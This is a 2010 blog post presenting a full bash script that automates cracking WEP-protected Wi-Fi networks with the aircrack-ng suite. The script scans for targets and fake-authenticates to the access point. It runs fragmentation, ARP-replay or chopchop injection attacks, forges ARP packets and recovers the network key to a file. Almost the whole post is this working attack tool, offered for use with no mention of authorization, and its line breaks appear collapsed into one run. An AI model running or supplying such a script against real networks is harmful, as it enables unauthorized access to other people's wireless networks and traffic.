Jul 102010
I thought I would post my bash wep cracking script. I made this on the backtrack 4 final linux distro, which is ubuntu, it utilizes aircrack-ng and a sub directory call data.
This script would be most of interest to people who are using multiple wireless interfaces to capture. It allows you you test each cards reception and specify which card is to do the injection and which are simply there to listen.
It implements all aircrack attacks against WEP hubs and I have success using all.
If I get interested in WPA cracking I’ll post another script.
kill_air() { kill `ps -A | grep air | grep -o -E '^[0-9]+'` } airodump_options="-a --write data/stations --beacons --output-format csv" cap=`iwconfig | grep -o -E '^\w+' | sed 's/$/,/g'` cap=`echo $cap | sed 's/,$//' | sed 's/ //g'` clear echo "Trips WEP cracking script" echo -n "http://www.somedodgywebsite.com/wp/software/wep-cracking-with-aircrack/" airmon-ng echo "Select injection interface" select opt in `echo $cap | sed 's/,/ /g'` do inj=$opt MAC=`ifconfig | grep "$inj" | grep -o -E '[0-9A-F-]+[ ]+$' | cut -c 1-17 | sed 's/-/:/g'` echo "DEBUG:MAC:$MAC" break done echo ""; echo "Select your best receiver" select opt in `echo $cap | sed 's/,/ /g'` do TRUMPET=$opt break done echo ""; echo -n "Just WEP? (y/n)[y] " read answer if [ "$answer" != "n" ] then airodump_options="$airodump_options --encrypt WEP" fi echo ""; echo -n "Select channel (1-13)[all] " read answer if [ "$answer" != "" ] then channel_options="--channel $answer" fi echo ""; echo "Setting capture cards" for int in `echo $cap | sed 's/,/ /g'` do ifconfig $int down iwconfig $int rate 1M iwconfig $int mode monitor iwconfig $int key off >/dev/null 2>&1 iwconfig $int txpower 16 >/dev/null 2>&1 iwconfig $int power off >/dev/null 2>&1 done echo -n "Check individual card reception (y/n)[n] " read answer if [ "$answer" = "y" ] then y=1 for int in `echo $cap | sed 's/,/ /g'` do terminator --geometry 1200x200+1+$y --command "airodump-ng $airodump_options $channel_options $int" & y=$(($y+150)) done echo -n "Happy with individual reception (y/n)[y] " read answer if [ "$answer" = "n" ] then exit fi fi rm data/stations* airodump-ng $airodump_options $channel_options $cap echo -n "Found suitable network to attack?(y/n)[y] " read answer if [ "$answer" = "n" ] then echo "Bummer :(" exit fi echo "Select ESSID target" select target in `awk -F , '{if (NR>2) print $14}' data/stations-01.csv | grep -E '\w'` do ESSID=$target break done BSSID=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $1}'` CHANNEL=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $4}' | grep -o -E '[0-9]+'` ENCRYPT=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $6}'` echo "" echo "ESSID = $ESSID" echo "BSSID = $BSSID" echo "Channel = $CHANNEL" echo "Encryption = $ENCRYPT" echo "Injection Interface = $inj" echo "Injection MAC = $MAC" echo "Best Reception Interface = $TRUMPET" echo "" echo -n "Proceed with attack? (y/n)[y] " read answer if [ "$answer" = "n" ] then echo "Goobye :)" exit fi echo "Setting interfaces for attack" for int in `echo $cap | sed 's/,/ /g'` do ifconfig $int down iwconfig $int rate 1M iwconfig $int mode monitor iwconfig $int power off >/dev/null 2>&1 iwconfig $int channel $CHANNEL done ifconfig $inj down #ignore : Tests have shown no difference between 1M and 54M on ar9170usb iwconfig $inj rate 1M iwconfig $inj channel $CHANNEL echo ""; echo "-> aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj" echo "Associating..." terminator --geometry 1200x100+1+1 --command "aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj" & echo ""; echo "Waiting 10 seconds for association..." sleep 10 echo "If association failed start it again in another console using the aforementioned command" echo "Press enter to continue with cracking" read answer echo "Choose attack method" select attack in `echo "CHOPCHOP" & echo "ARP" & echo "Fragment"`; do echo "$attack Selected"; echo ""; break; done if [ "$attack" = "Fragment" ] then rm fragment*.xor rm replay_src*.cap echo "" echo "-> aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj" aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj echo "" echo "-> packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt" packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt echo "" echo "-> aireplay-ng --interactive -F -r data/$ESSID.pkt -x 200 -h $MAC -b $BSSID $inj" aireplay-ng --interactive -F -r data/$ESSID.pkt -x 100 -h $MAC -b $BSSID $inj & echo "" echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" & echo "" echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs" terminator --geometry 1200x200+1+300 --command "echo 'Cracking stating in 10 seconds' ; sleep 10 ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt" kill_air fi if [ "$attack" = "ARP" ] then echo "-> aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj" aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj & echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" & echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs" terminator --geometry 1200x200+1+300 --command "echo 'Press enter to start cracking, you must have started sending packets.' ; read answer ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt" kill_air fi if [ "$attack" = "CHOPCHOP" ] then echo ""; echo "-> aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj" aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj fi echo ""; echo "These 'air*' processes are still running:" echo `ps -A | grep air`